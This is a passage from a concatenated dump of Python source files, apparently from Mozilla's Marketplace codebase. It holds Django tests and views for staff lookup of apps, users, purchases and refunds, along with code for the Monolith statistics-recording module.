self.user = UserProfile.objects.get(username='31337')
assert self.client.login(username='[email protected]',
password='password')
def summary(self, expected_status=200):
res = self.client.get(self.url)
eq_(res.status_code, expected_status)
return res
class TestAppSummary(AppSummaryTest):
fixtures = fixture('prices', 'user_admin', 'user_support_staff',
'webapp_337141', 'user_operator')
def setUp(self):
super(TestAppSummary, self).setUp()
self._setUp()
def test_app_deleted(self):
self.app.delete()
self.summary()
def test_packaged_app_deleted(self):
self.app.update(is_packaged=True)
ver = amo.tests.version_factory(addon=self.app)
amo.tests.file_factory(version=ver)
self.app.delete()
self.summary()
def test_authors(self):
user = UserProfile.objects.get(username='31337')
role = AddonUser.objects.create(user=user,
addon=self.app,
role=amo.AUTHOR_ROLE_DEV)
self.app.addonuser_set.add(role)
res = self.summary()
eq_(res.context['authors'][0].display_name, user.display_name)
def test_visible_authors(self):
AddonUser.objects.all().delete()
for role in (amo.AUTHOR_ROLE_DEV,
amo.AUTHOR_ROLE_OWNER,
amo.AUTHOR_ROLE_VIEWER,
amo.AUTHOR_ROLE_SUPPORT):
user = UserProfile.objects.create(username=role)
role = AddonUser.objects.create(user=user,
addon=self.app,
role=role)
self.app.addonuser_set.add(role)
res = self.summary()
eq_(sorted([u.username for u in res.context['authors']]),
[str(amo.AUTHOR_ROLE_DEV), str(amo.AUTHOR_ROLE_OWNER)])
def test_details(self):
res = self.summary()
eq_(res.context['app'].manifest_url, self.app.manifest_url)
eq_(res.context['app'].premium_type, amo.ADDON_FREE)
eq_(res.context['price'], None)
def test_price(self):
self.make_premium(self.app)
res = self.summary()
eq_(res.context['price'], self.app.premium.price)
def test_abuse_reports(self):
for i in range(2):
AbuseReport.objects.create(addon=self.app,
ip_address='10.0.0.1',
message='spam and porn everywhere')
res = self.summary()
eq_(res.context['abuse_reports'], 2)
def test_permissions(self):
raise SkipTest('we do not support permissions yet')
def test_version_history_non_packaged(self):
res = self.summary()
eq_(pq(res.content)('section.version-history').length, 0)
def test_version_history_packaged(self):
self.app.update(is_packaged=True)
self.version = self.app.current_version
self.file = self.version.all_files[0]
self.file.update(filename='mozball.zip')
res = self.summary()
eq_(pq(res.content)('section.version-history').length, 1)
assert 'mozball.zip' in pq(res.content)(
'section.version-history a.download').attr('href')
def test_edit_link_staff(self):
res = self.summary()
eq_(pq(res.content)('.shortcuts li').length, 4)
eq_(pq(res.content)('.shortcuts li').eq(3).text(), 'Edit Listing')
def test_operator_200(self):
assert self.client.login(username='[email protected]',
password='password')
res = self.client.get(self.url)
eq_(res.status_code, 200)
def test_priority_button_available(self):
res = self.summary()
eq_(pq(res.content)('section.column-b button.button').attr('name'),
'prioritize')
eq_(pq(res.content)('section.column-b button.button').text(),
'Prioritize Review?')
def test_priority_button_already_prioritized(self):
self.app.update(priority_review=True)
res = self.summary()
eq_(pq(res.content)('section.column-b button.button,disabled')
.attr('name'), 'prioritize')
eq_(pq(res.content)('section.column-b button.button,disabled').text(),
'Review Prioritized')
def test_priority_button_works(self):
staff = UserProfile.objects.get(username='support_staff')
req = req_factory_factory(self.url, post=True, user=staff,
data={'prioritize': 'true'})
app_summary(req, self.app.id)
self.app.reload()
eq_(self.app.priority_review, True)
@mock.patch.object(settings, 'PAYMENT_PROVIDERS', ['bango', 'boku'])
def test_multiple_payment_accounts(self):
self.add_payment_accounts([PROVIDER_BANGO, PROVIDER_BOKU])
res = self.summary()
self.verify_bango_boku_portals(self.app, res)
class TestAppSummaryPurchases(AppSummaryTest):
def setUp(self):
super(TestAppSummaryPurchases, self).setUp()
self._setUp()
def assert_totals(self, data):
eq_(data['total'], 6)
six_bucks = numbers.format_currency(6, 'USD',
locale=numbers.LC_NUMERIC)
three_euro = numbers.format_currency(3, 'EUR',
locale=numbers.LC_NUMERIC)
eq_(set(data['amounts']), set([six_bucks, three_euro]))
eq_(len(data['amounts']), 2)
def assert_empty(self, data):
eq_(data['total'], 0)
eq_(sorted(data['amounts']), [])
def purchase(self, created=None, typ=amo.CONTRIB_PURCHASE):
for curr, amount in (('USD', '2.00'), ('EUR', '1.00')):
for i in range(3):
c = Contribution.objects.create(addon=self.app,
user=self.user,
amount=Decimal(amount),
currency=curr,
type=typ)
if created:
c.update(created=created)
def test_24_hr(self):
self.purchase()
res = self.summary()
self.assert_totals(res.context['purchases']['last_24_hours'])
def test_ignore_older_than_24_hr(self):
self.purchase(created=datetime.now() - timedelta(days=1,
minutes=1))
res = self.summary()
self.assert_empty(res.context['purchases']['last_24_hours'])
def test_7_days(self):
self.purchase(created=datetime.now() - timedelta(days=6,
minutes=55))
res = self.summary()
self.assert_totals(res.context['purchases']['last_7_days'])
def test_ignore_older_than_7_days(self):
self.purchase(created=datetime.now() - timedelta(days=7,
minutes=1))
res = self.summary()
self.assert_empty(res.context['purchases']['last_7_days'])
def test_alltime(self):
self.purchase(created=datetime.now() - timedelta(days=31))
res = self.summary()
self.assert_totals(res.context['purchases']['alltime'])
def test_ignore_non_purchases(self):
for typ in [amo.CONTRIB_REFUND,
amo.CONTRIB_CHARGEBACK,
amo.CONTRIB_PENDING]:
self.purchase(typ=typ)
res = self.summary()
self.assert_empty(res.context['purchases']['alltime'])
class TestAppSummaryRefunds(AppSummaryTest):
fixtures = AppSummaryTest.fixtures + fixture('user_999', 'user_admin')
def setUp(self):
super(TestAppSummaryRefunds, self).setUp()
self._setUp()
self.user = UserProfile.objects.get(username='regularuser')
self.contrib1 = self.purchase()
self.contrib2 = self.purchase()
self.contrib3 = self.purchase()
self.contrib4 = self.purchase()
def purchase(self):
return Contribution.objects.create(addon=self.app,
user=self.user,
amount=Decimal('0.99'),
currency='USD',
paykey='AP-1235',
type=amo.CONTRIB_PURCHASE)
def refund(self, refunds):
for contrib, status in refunds:
Refund.objects.create(contribution=contrib,
status=status,
user=self.user)
def test_requested(self):
self.refund(((self.contrib1, amo.REFUND_APPROVED),
(self.contrib2, amo.REFUND_APPROVED),
(self.contrib3, amo.REFUND_DECLINED),
(self.contrib4, amo.REFUND_DECLINED)))
res = self.summary()
eq_(res.context['refunds']['requested'], 2)
eq_(res.context['refunds']['percent_of_purchases'], '50.0%')
def test_no_refunds(self):
res = self.summary()
eq_(res.context['refunds']['requested'], 0)
eq_(res.context['refunds']['percent_of_purchases'], '0.0%')
eq_(res.context['refunds']['auto-approved'], 0)
eq_(res.context['refunds']['approved'], 0)
eq_(res.context['refunds']['rejected'], 0)
def test_auto_approved(self):
self.refund(((self.contrib1, amo.REFUND_APPROVED),
(self.contrib2, amo.REFUND_APPROVED_INSTANT)))
res = self.summary()
eq_(res.context['refunds']['auto-approved'], 1)
def test_approved(self):
self.refund(((self.contrib1, amo.REFUND_APPROVED),
(self.contrib2, amo.REFUND_DECLINED)))
res = self.summary()
eq_(res.context['refunds']['approved'], 1)
def test_rejected(self):
self.refund(((self.contrib1, amo.REFUND_APPROVED),
(self.contrib2, amo.REFUND_DECLINED),
(self.contrib3, amo.REFUND_FAILED)))
res = self.summary()
eq_(res.context['refunds']['rejected'], 2)
class TestPurchases(amo.tests.TestCase):
fixtures = ['base/users'] + fixture('webapp_337141')
def setUp(self):
self.app = Webapp.objects.get(pk=337141)
self.reviewer = UserProfile.objects.get(username='admin')
self.user = UserProfile.objects.get(username='regularuser')
self.url = reverse('lookup.user_purchases', args=[self.user.pk])
def test_not_allowed(self):
self.client.logout()
self.assertLoginRequired(self.client.get(self.url))
def test_not_even_mine(self):
self.client.login(username=self.user.email, password='password')
eq_(self.client.get(self.url).status_code, 403)
def test_access(self):
self.client.login(username=self.reviewer.email, password='password')
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(pq(res.content)('p.notice').length, 1)
def test_purchase_shows_up(self):
Contribution.objects.create(user=self.user, addon=self.app,
amount=1, type=amo.CONTRIB_PURCHASE)
self.client.login(username=self.reviewer.email, password='password')
res = self.client.get(self.url)
eq_(res.status_code, 200)
doc = pq(res.content)
eq_(doc('div.product-lookup-list a').attr('href'),
self.app.get_detail_url())
def test_no_support_link(self):
for type_ in [amo.CONTRIB_PURCHASE]:
Contribution.objects.create(user=self.user, addon=self.app,
amount=1, type=type_)
self.client.login(username=self.reviewer.email, password='password')
res = self.client.get(self.url)
eq_(res.status_code, 200)
doc = pq(res.content)
eq_(len(doc('.item a.request-support')), 0)
class TestActivity(amo.tests.TestCase):
fixtures = ['base/users'] + fixture('webapp_337141')
def setUp(self):
self.app = Webapp.objects.get(pk=337141)
self.reviewer = UserProfile.objects.get(username='admin')
self.user = UserProfile.objects.get(username='regularuser')
self.url = reverse('lookup.user_activity', args=[self.user.pk])
def test_not_allowed(self):
self.client.logout()
self.assertLoginRequired(self.client.get(self.url))
def test_not_even_mine(self):
self.client.login(username=self.user.email, password='password')
eq_(self.client.get(self.url).status_code, 403)
def test_access(self):
self.client.login(username=self.reviewer.email, password='password')
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(len(pq(res.content)('.simple-log div')), 0)
def test_log(self):
self.client.login(username=self.reviewer.email, password='password')
self.client.get(self.url)
log_item = ActivityLog.objects.get(action=amo.LOG.ADMIN_VIEWED_LOG.id)
eq_(len(log_item.arguments), 1)
eq_(log_item.arguments[0].id, self.reviewer.id)
eq_(log_item.user, self.user)
def test_display(self):
amo.log(amo.LOG.PURCHASE_ADDON, self.app, user=self.user)
amo.log(amo.LOG.ADMIN_USER_EDITED, self.user, 'spite', user=self.user)
self.client.login(username=self.reviewer.email, password='password')
res = self.client.get(self.url)
eq_(res.status_code, 200)
doc = pq(res.content)
assert 'purchased' in doc('li.item').eq(0).text()
assert 'edited' in doc('li.item').eq(1).text()
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from . import views
# These views all start with user ID.
user_patterns = patterns('',
url(r'^summary$', views.user_summary, name='lookup.user_summary'),
url(r'^purchases$', views.user_purchases,
name='lookup.user_purchases'),
url(r'^activity$', views.user_activity, name='lookup.user_activity'),
url(r'^delete$', views.user_delete, name='lookup.user_delete'),
)
# These views all start with app/addon ID.
app_patterns = patterns('',
url(r'^summary$', views.app_summary, name='lookup.app_summary'),
)
# These views all start with transaction ID.
transaction_patterns = patterns('',
url(r'^refund$', views.transaction_refund,
name='lookup.transaction_refund'),
url(r'^summary$', views.transaction_summary,
name='lookup.transaction_summary'),
)
urlpatterns = patterns('',
url(r'^$', views.home, name='lookup.home'),
url(r'^bango-portal/(?P<package_id>[^/]+)/$',
views.bango_portal_from_package,
name='lookup.bango_portal_from_package'),
url(r'^user_search\.json$', views.user_search,
name='lookup.user_search'),
url(r'^transaction_search$', views.transaction_search,
name='lookup.transaction_search'),
url(r'^app_search\.json$', views.app_search,
name='lookup.app_search'),
(r'^app/(?P<addon_id>[^/]+)/', include(app_patterns)),
(r'^transaction/(?P<tx_uuid>[^/]+)/', include(transaction_patterns)),
(r'^user/(?P<user_id>[^/]+)/', include(user_patterns)),
)
########NEW FILE########
__FILENAME__ = views
import hashlib
import json
import uuid
from datetime import datetime, timedelta
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db import connection
from django.db.models import Count, Q, Sum
from django.http import Http404, HttpResponseRedirect
from django.shortcuts import get_object_or_404, redirect, render
import commonware.log
from babel import numbers
from elasticutils.contrib.django import S
from slumber.exceptions import HttpClientError, HttpServerError
from tower import ugettext as _
import amo
import mkt.constants.lookup as lkp
from amo.decorators import (json_view, login_required, permission_required,
post_required)
from amo.utils import paginate
from apps.access import acl
from devhub.models import ActivityLog
from lib.pay_server import client
from mkt.account.utils import purchase_list
from mkt.comm.utils import create_comm_note
from mkt.constants import comm
from mkt.constants.payments import COMPLETED, FAILED, PENDING, REFUND_STATUSES
from mkt.developers.models import AddonPaymentAccount
from mkt.developers.providers import get_provider
from mkt.developers.views_payments import _redirect_to_bango_portal
from mkt.lookup.forms import (DeleteUserForm, TransactionRefundForm,
TransactionSearchForm)
from mkt.lookup.tasks import (email_buyer_refund_approved,
email_buyer_refund_pending)
from mkt.site import messages
from mkt.webapps.models import Webapp, WebappIndexer
from mkt.prices.models import AddonPaymentData, Refund
from stats.models import Contribution
from users.models import UserProfile
log = commonware.log.getLogger('z.lookup')
@login_required
@permission_required('Lookup', 'View')
def home(request):
tx_form = TransactionSearchForm()
return render(request, 'lookup/home.html', {'tx_form': tx_form})
@login_required
@permission_required('AccountLookup', 'View')
def user_summary(request, user_id):
user = get_object_or_404(UserProfile, pk=user_id)
is_admin = acl.action_allowed(request, 'Users', 'Edit')
app_summary = _app_summary(user.pk)
# All refunds that this user has requested (probably as a consumer).
req = Refund.objects.filter(contribution__user=user)
# All instantly-approved refunds that this user has requested.
appr = req.filter(status=amo.REFUND_APPROVED_INSTANT)
refund_summary = {'approved': appr.count(),
'requested': req.count()}
# TODO: This should return all `addon` types and not just webapps.
# -- currently get_details_url() fails on non-webapps so this is a
# temp fix.
user_addons = (user.addons.filter(type=amo.ADDON_WEBAPP)
.order_by('-created'))
user_addons = paginate(request, user_addons, per_page=15)
paypal_ids = set(user.addons.exclude(paypal_id='')
.values_list('paypal_id', flat=True))
payment_data = (AddonPaymentData.objects.filter(addon__authors=user)
.values(*AddonPaymentData.address_fields())
.distinct())
# If the user is deleted, get the log detailing the delete.
try:
delete_log = ActivityLog.objects.for_user(user).filter(
action=amo.LOG.DELETE_USER_LOOKUP.id)[0]
except IndexError:
delete_log = None
provider_portals = get_payment_provider_portals(user=user)
return render(request, 'lookup/user_summary.html',
{'account': user, 'app_summary': app_summary,
'delete_form': DeleteUserForm(), 'delete_log': delete_log,
'is_admin': is_admin, 'refund_summary': refund_summary,
'user_addons': user_addons, 'payment_data': payment_data,
'paypal_ids': paypal_ids,
'provider_portals': provider_portals})
@login_required
@permission_required('AccountLookup', 'View')
def user_delete(request, user_id):
delete_form = DeleteUserForm(request.POST)
if not delete_form.is_valid():
messages.error(request, delete_form.errors)
return HttpResponseRedirect(reverse('lookup.user_summary',
args=[user_id]))
user = get_object_or_404(UserProfile, pk=user_id)
user.deleted = True
user.save() # Must call the save function to delete user.
amo.log(amo.LOG.DELETE_USER_LOOKUP, user,
details={'reason': delete_form.cleaned_data['delete_reason']},
user=request.amo_user)
return HttpResponseRedirect(reverse('lookup.user_summary', args=[user_id]))
@login_required
@permission_required('Transaction', 'View')
def transaction_summary(request, tx_uuid):
tx_data = _transaction_summary(tx_uuid)
if not tx_data:
raise Http404
tx_form = TransactionSearchForm()
tx_refund_form = TransactionRefundForm()
return render(request, 'lookup/transaction_summary.html',
dict({'uuid': tx_uuid, 'tx_form': tx_form,
'tx_refund_form': tx_refund_form}.items() +
tx_data.items()))
def _transaction_summary(tx_uuid):
"""Get transaction details from Solitude API."""
contrib = get_object_or_404(Contribution, uuid=tx_uuid)
refund_contribs = contrib.get_refund_contribs()
refund_contrib = refund_contribs[0] if refund_contribs.exists() else None
# Get refund status.
refund_status = None
if refund_contrib and refund_contrib.refund.status == amo.REFUND_PENDING:
try:
refund_status = REFUND_STATUSES[client.api.bango.refund.status.get(
data={'uuid': refund_contrib.transaction_id})['status']]
except HttpServerError:
refund_status = _('Currently unable to retrieve refund status.')
return {
# Solitude data.
'refund_status': refund_status,
# Zamboni data.
'app': contrib.addon,
'contrib': contrib,
'related': contrib.related,
'type': amo.CONTRIB_TYPES.get(contrib.type, _('Incomplete')),
# Whitelist what is refundable.
'is_refundable': ((contrib.type == amo.CONTRIB_PURCHASE)
and not refund_contrib),
}
@post_required
@login_required
@permission_required('Transaction', 'Refund')
def transaction_refund(request, tx_uuid):
contrib = get_object_or_404(Contribution, uuid=tx_uuid,
type=amo.CONTRIB_PURCHASE)
refund_contribs = contrib.get_refund_contribs()
refund_contrib = refund_contribs[0] if refund_contribs.exists() else None
if refund_contrib:
messages.error(request, _('A refund has already been processed.'))
return redirect(reverse('lookup.transaction_summary', args=[tx_uuid]))
form = TransactionRefundForm(request.POST)
if not form.is_valid():
return render(request, 'lookup/transaction_summary.html',
dict({'uuid': tx_uuid, 'tx_refund_form': form,
'tx_form': TransactionSearchForm()}.items() +
_transaction_summary(tx_uuid).items()))
data = {'uuid': contrib.transaction_id,
'manual': form.cleaned_data['manual']}
if settings.BANGO_FAKE_REFUNDS:
data['fake_response_status'] = {'responseCode':
form.cleaned_data['fake']}
try:
res = client.api.bango.refund.post(data)
except (HttpClientError, HttpServerError):
# Either doing something not supposed to or Solitude had an issue.
log.exception('Refund error: %s' % tx_uuid)
messages.error(
request,
_('You cannot make a refund request for this transaction.'))
return redirect(reverse('lookup.transaction_summary', args=[tx_uuid]))
if res['status'] in [PENDING, COMPLETED]:
# Create refund Contribution by cloning the payment Contribution.
refund_contrib = Contribution.objects.get(id=contrib.id)
refund_contrib.id = None
refund_contrib.save()
refund_contrib.update(
type=amo.CONTRIB_REFUND, related=contrib,
uuid=hashlib.md5(str(uuid.uuid4())).hexdigest(),
amount=-refund_contrib.amount if refund_contrib.amount else None,
transaction_id=res['uuid'])
if res['status'] == PENDING:
# Create pending Refund.
refund_contrib.enqueue_refund(
amo.REFUND_PENDING, request.amo_user,
refund_reason=form.cleaned_data['refund_reason'])
log.info('Refund pending: %s' % tx_uuid)
email_buyer_refund_pending(contrib)
messages.success(
request, _('Refund for this transaction now pending.'))
elif res['status'] == COMPLETED:
# Create approved Refund.
refund_contrib.enqueue_refund(
amo.REFUND_APPROVED, request.amo_user,
refund_reason=form.cleaned_data['refund_reason'])
log.info('Refund approved: %s' % tx_uuid)
email_buyer_refund_approved(contrib)
messages.success(
request, _('Refund for this transaction successfully approved.'))
elif res['status'] == FAILED:
# Bango no like.
log.error('Refund failed: %s' % tx_uuid)
messages.error(
request, _('Refund request for this transaction failed.'))
return redirect(reverse('lookup.transaction_summary', args=[tx_uuid]))
@login_required
@permission_required('AppLookup', 'View')
def app_summary(request, addon_id):
app = get_object_or_404(Webapp.with_deleted, pk=addon_id)
if 'prioritize' in request.POST and not app.priority_review:
app.update(priority_review=True)
msg = u'Priority Review Requested'
# Create notes and log entries.
create_comm_note(app, app.latest_version, request.amo_user, msg,
note_type=comm.NO_ACTION)
amo.log(amo.LOG.PRIORITY_REVIEW_REQUESTED, app, app.latest_version,
created=datetime.now(), details={'comments': msg})
authors = (app.authors.filter(addonuser__role__in=(amo.AUTHOR_ROLE_DEV,
amo.AUTHOR_ROLE_OWNER))
.order_by('display_name'))
if app.premium and app.premium.price:
price = app.premium.price
else:
price = None
purchases, refunds = _app_purchases_and_refunds(app)
provider_portals = get_payment_provider_portals(app=app)
return render(request, 'lookup/app_summary.html',
{'abuse_reports': app.abuse_reports.count(), 'app': app,
'authors': authors, 'downloads': _app_downloads(app),
'purchases': purchases, 'refunds': refunds, 'price': price,
'provider_portals': provider_portals})
@login_required
@permission_required('BangoPortal', 'Redirect')
def bango_portal_from_package(request, package_id):
response = _redirect_to_bango_portal(package_id,
'package_id: %s' % package_id)
if 'Location' in response:
return HttpResponseRedirect(response['Location'])
else:
message = (json.loads(response.content)
.get('__all__', response.content)[0])
messages.error(request, message)
return HttpResponseRedirect(reverse('lookup.home'))
@login_required
@permission_required('AccountLookup', 'View')
def user_purchases(request, user_id):
"""Shows the purchase page for another user."""
user = get_object_or_404(UserProfile, pk=user_id)
is_admin = acl.action_allowed(request, 'Users', 'Edit')
products, contributions, listing = purchase_list(request, user, None)
return render(request, 'lookup/user_purchases.html',
{'pager': products, 'account': user, 'is_admin': is_admin,
'listing_filter': listing, 'contributions': contributions,
'single': bool(None), 'show_link': False})
@login_required
@permission_required('AccountLookup', 'View')
def user_activity(request, user_id):
"""Shows the user activity page for another user."""
user = get_object_or_404(UserProfile, pk=user_id)
products, contributions, listing = purchase_list(request, user, None)
is_admin = acl.action_allowed(request, 'Users', 'Edit')
user_items = ActivityLog.objects.for_user(user).exclude(
action__in=amo.LOG_HIDE_DEVELOPER)
admin_items = ActivityLog.objects.for_user(user).filter(
action__in=amo.LOG_HIDE_DEVELOPER)
amo.log(amo.LOG.ADMIN_VIEWED_LOG, request.amo_user, user=user)
return render(request, 'lookup/user_activity.html',
{'pager': products, 'account': user, 'is_admin': is_admin,
'listing_filter': listing,
'contributions': contributions, 'single': bool(None),
'user_items': user_items, 'admin_items': admin_items,
'show_link': False})
def _expand_query(q, fields):
query = {}
rules = [
('term', {'value': q, 'boost': 10}),
('match', {'query': q, 'boost': 4, 'type': 'phrase'}),
('match', {'query': q, 'boost': 3}),
('fuzzy', {'value': q, 'boost': 2, 'prefix_length': 4}),
('startswith', {'value': q, 'boost': 1.5}),
]
for k, v in rules:
for field in fields:
query['%s__%s' % (field, k)] = v
return query
@login_required
@permission_required('AccountLookup', 'View')
@json_view
def user_search(request):
results = []
q = request.GET.get('q', u'').lower().strip()
search_fields = ('username', 'display_name', 'email')
fields = ('id',) + search_fields
if q.isnumeric():
# id is added implictly by the ES filter. Add it explicitly:
qs = UserProfile.objects.filter(pk=q).values(*fields)
else:
qs = UserProfile.objects.all()
filters = Q()
for field in search_fields:
filters = filters | Q(**{'%s__icontains' % field: q})
qs = qs.filter(filters)
qs = qs.values(*fields)
qs = _slice_results(request, qs)
for user in qs:
user['url'] = reverse('lookup.user_summary', args=[user['id']])
user['name'] = user['username']
results.append(user)
return {'results': results}
@login_required
@permission_required('Transaction', 'View')
def transaction_search(request):
tx_form = TransactionSearchForm(request.GET)
if tx_form.is_valid():
return redirect(reverse('lookup.transaction_summary',
args=[tx_form.cleaned_data['q']]))
else:
return render(request, 'lookup/home.html', {'tx_form': tx_form})
@login_required
@permission_required('AppLookup', 'View')
@json_view
def app_search(request):
results = []
q = request.GET.get('q', u'').lower().strip()
fields = ('name', 'app_slug')
non_es_fields = ['id', 'name__localized_string'] + list(fields)
if q.isnumeric():
qs = (Webapp.objects.filter(pk=q)
.values(*non_es_fields))
else:
# Try to load by GUID:
qs = (Webapp.objects.filter(guid=q)
.values(*non_es_fields))
if not qs.count():
qs = (S(WebappIndexer)
.query(should=True, **_expand_query(q, fields))
.values_dict(*['id'] + list(fields)))
qs = _slice_results(request, qs)
for app in qs:
if 'name__localized_string' in app:
# This is a result from the database.
app['url'] = reverse('lookup.app_summary', args=[app['id']])
app['name'] = app['name__localized_string']
results.append(app)
else:
# This is a result from elasticsearch which returns name as a list.
app['url'] = reverse('lookup.app_summary', args=[app['id']])
for field in ('id', 'app_slug'):
app[field] = app.get(field)
for name in app['name']:
dd = app.copy()
dd['name'] = name
results.append(dd)
return {'results': results}
def _app_downloads(app):
stats = {'last_7_days': 0,
'last_24_hours': 0,
'alltime': 0}
# Webapps populate these fields via Monolith.
stats['last_24_hours'] = 'N/A'
stats['last_7_days'] = app.weekly_downloads
stats['alltime'] = app.total_downloads
return stats
def _app_summary(user_id):
sql = """
select currency,
sum(case when type=%(purchase)s then 1 else 0 end)
as app_total,
sum(case when type=%(purchase)s then amount else 0.0 end)
as app_amount
from stats_contributions
where user_id=%(user_id)s
group by currency
"""
cursor = connection.cursor()
cursor.execute(sql, {'user_id': user_id,
'purchase': amo.CONTRIB_PURCHASE})
summary = {'app_total': 0,
'app_amount': {}}
cols = [cd[0] for cd in cursor.description]
while 1:
row = cursor.fetchone()
if not row:
break
row = dict(zip(cols, row))
for cn in cols:
if cn.endswith('total'):
summary[cn] += row[cn]
elif cn.endswith('amount'):
summary[cn][row['currency']] = row[cn]
return summary
def _app_purchases_and_refunds(addon):
purchases = {}
now = datetime.now()
base_qs = (Contribution.objects.values('currency')
.annotate(total=Count('id'),
amount=Sum('amount'))
.filter(addon=addon)
.exclude(type__in=[amo.CONTRIB_REFUND,
amo.CONTRIB_CHARGEBACK,
amo.CONTRIB_PENDING]))
for typ, start_date in (('last_24_hours', now - timedelta(hours=24)),
('last_7_days', now - timedelta(days=7)),
('alltime', None),):
qs = base_qs.all()
if start_date:
qs = qs.filter(created__gte=start_date)
sums = list(qs)
purchases[typ] = {'total': sum(s['total'] for s in sums),
'amounts': [numbers.format_currency(s['amount'],
s['currency'])
for s in sums if s['currency']]}
refunds = {}
rejected_q = Q(status=amo.REFUND_DECLINED) | Q(status=amo.REFUND_FAILED)
qs = Refund.objects.filter(contribution__addon=addon)
refunds['requested'] = qs.exclude(rejected_q).count()
percent = 0.0
total = purchases['alltime']['total']
if total:
percent = (refunds['requested'] / float(total)) * 100.0
refunds['percent_of_purchases'] = '%.1f%%' % percent
refunds['auto-approved'] = (qs.filter(status=amo.REFUND_APPROVED_INSTANT)
.count())
refunds['approved'] = qs.filter(status=amo.REFUND_APPROVED).count()
refunds['rejected'] = qs.filter(rejected_q).count()
return purchases, refunds
def _slice_results(request, qs):
if request.GET.get('all_results'):
return qs[:lkp.MAX_RESULTS]
else:
return qs[:lkp.SEARCH_LIMIT]
def get_payment_provider_portals(app=None, user=None):
"""
Get a list of dicts describing the payment portals for this app or user.
Either app or user is required.
"""
provider_portals = []
if app:
q = dict(addon=app)
elif user:
q = dict(payment_account__user=user)
else:
raise ValueError('user or app is required')
for acct in (AddonPaymentAccount.objects.filter(**q)
.select_related('payment_account')):
provider = get_provider(id=acct.payment_account.provider)
portal_url = provider.get_portal_url(acct.addon.app_slug)
if portal_url:
provider_portals.append({
'provider': provider,
'app': acct.addon,
'portal_url': portal_url,
'payment_account': acct.payment_account
})
return provider_portals
########NEW FILE########
__FILENAME__ = forms
from django import forms
import happyforms
class MonolithForm(happyforms.Form):
key = forms.CharField(required=False)
start = forms.DateField(required=False)
end = forms.DateField(required=False)
########NEW FILE########
__FILENAME__ = create_monolith_user
from optparse import make_option
from django.conf import settings
from django.core.management.base import BaseCommand
from mkt.site.management.commands.add_test_users import create_user
class Command(BaseCommand):
help = """Create an user with access to the monolith API"""
option_list = BaseCommand.option_list + (
make_option(
'--overwrite', action='store_true',
dest='overwrite', default=False,
help='Overwrite the user access token if it already exists'),)
def handle(self, *args, **kw):
create_user('[email protected]',
overwrite=kw['overwrite'],
password=settings.MONOLITH_PASSWORD,
group_name='Monolith API')
########NEW FILE########
__FILENAME__ = models
import datetime
import hashlib
import json
from django.db import models
class MonolithRecord(models.Model):
"""Data stored temporarily for monolith.
It contains a key (e.g. "app.install"), the date of the record, a user (a
string representing a unique user) and a value (which internally is stored
as a JSON object).
"""
key = models.CharField(max_length=255)
recorded = models.DateTimeField()
user_hash = models.CharField(max_length=255, blank=True)
value = models.TextField()
class Meta:
db_table = 'monolith_record'
def get_user_hash(request):
"""Get a hash identifying an user.
It's a hash of session key, ip and user agent
"""
ip = request.META.get('REMOTE_ADDR', '')
ua = request.META.get('User-Agent', '')
session_key = request.session.session_key or ''
return hashlib.sha1('-'.join(map(str, (ip, ua, session_key)))).hexdigest()
def record_stat(key, request, **data):
"""Create a new record in the database with the given values.
:param key:
The type of stats you're sending, e.g. "app.install".
:param request:
The request associated with this call. It will be used to define who
the user is.
:para: data:
The data you want to store. You can pass the data to this function as
named arguments.
"""
if '__recorded' in data:
recorded = data.pop('__recorded')
else:
recorded = datetime.datetime.utcnow()
if not data:
raise ValueError('You should at least define one value')
record = MonolithRecord(key=key, user_hash=get_user_hash(request),
recorded=recorded, value=json.dumps(data))
record.save()
return record
########NEW FILE########
__FILENAME__ = serializers
import json
from rest_framework import serializers
from .models import MonolithRecord
class MonolithSerializer(serializers.ModelSerializer):
class Meta:
model = MonolithRecord
fields = ('key', 'recorded', 'user_hash', 'value')
def transform_value(self, obj, value):
if not isinstance(value, basestring):
return value
return json.loads(value)
########NEW FILE########
__FILENAME__ = tests
import datetime
import json
import uuid
from collections import namedtuple
import mock
from nose.tools import eq_, ok_
from django.core.urlresolvers import reverse
from django.test import client
from amo.tests import TestCase
from mkt.api.tests.test_oauth import RestOAuth
from mkt.site.fixtures import fixture
from .models import MonolithRecord, record_stat
from .views import daterange
class RequestFactory(client.RequestFactory):
def __init__(self, session_key=None, user_agent=None,
remote_addr=None, anonymous=True, *args, **kwargs):
class User(object):
def is_anonymous(self):
return anonymous
Session = namedtuple('Session', 'session_key')
self.session = Session(session_key or str(uuid.uuid1()))
self.user = User()
self.META = {}
if remote_addr:
self.META['REMOTE_ADDR'] = remote_addr
if user_agent:
self.META['User-Agent'] = user_agent
super(RequestFactory, self).__init__(*args, **kwargs)
def total_seconds(td):
# not present in 2.6
return ((td.microseconds + (td.seconds + td.days * 24 * 3600) * 10 ** 6) /
10 ** 6)
class TestModels(TestCase):
def setUp(self):
super(TestModels, self).setUp()
self.request = RequestFactory()
def test_record_stat(self):
now = datetime.datetime.utcnow()
record_stat('app.install', self.request, value=1)
# we should have only one record
record = MonolithRecord.objects.get()
eq_(record.key, 'app.install')
eq_(record.value, json.dumps({'value': 1}))
self.assertTrue(total_seconds(record.recorded - now) < 1)
def test_record_stat_without_data(self):
with self.assertRaises(ValueError):
record_stat('app.install', self.request)
class TestMonolithResource(RestOAuth):
fixtures = fixture('user_2519')
def setUp(self):
super(TestMonolithResource, self).setUp()
self.grant_permission(self.profile, 'Monolith:API')
self.list_url = reverse('monolith-list')
self.now = datetime.datetime(2013, 02, 12, 17, 34)
self.last_month = self.now - datetime.timedelta(days=30)
self.last_week = self.now - datetime.timedelta(days=7)
self.yesterday = self.now - datetime.timedelta(days=1)
self.date_format = '%Y-%m-%d'
self.request = RequestFactory()
def test_normal_call_with_no_records(self):
res = self.client.get(self.list_url)
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(data['objects'], [])
def test_normal_call(self):
record_stat('app.install', self.request, value=2)
res = self.client.get(self.list_url)
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(len(data['objects']), 1)
obj = data['objects'][0]
eq_(obj['key'], 'app.install')
eq_(obj['value'], {'value': 2})
# Check other fields we want to exist but ignore their value here.
for field in ('recorded', 'user_hash'):
assert field in obj
def test_filter_by_date(self):
for id_, date in enumerate((self.last_week, self.yesterday, self.now)):
record_stat('app.install', self.request, __recorded=date,
value=id_)
res = self.client.get(self.list_url, data={
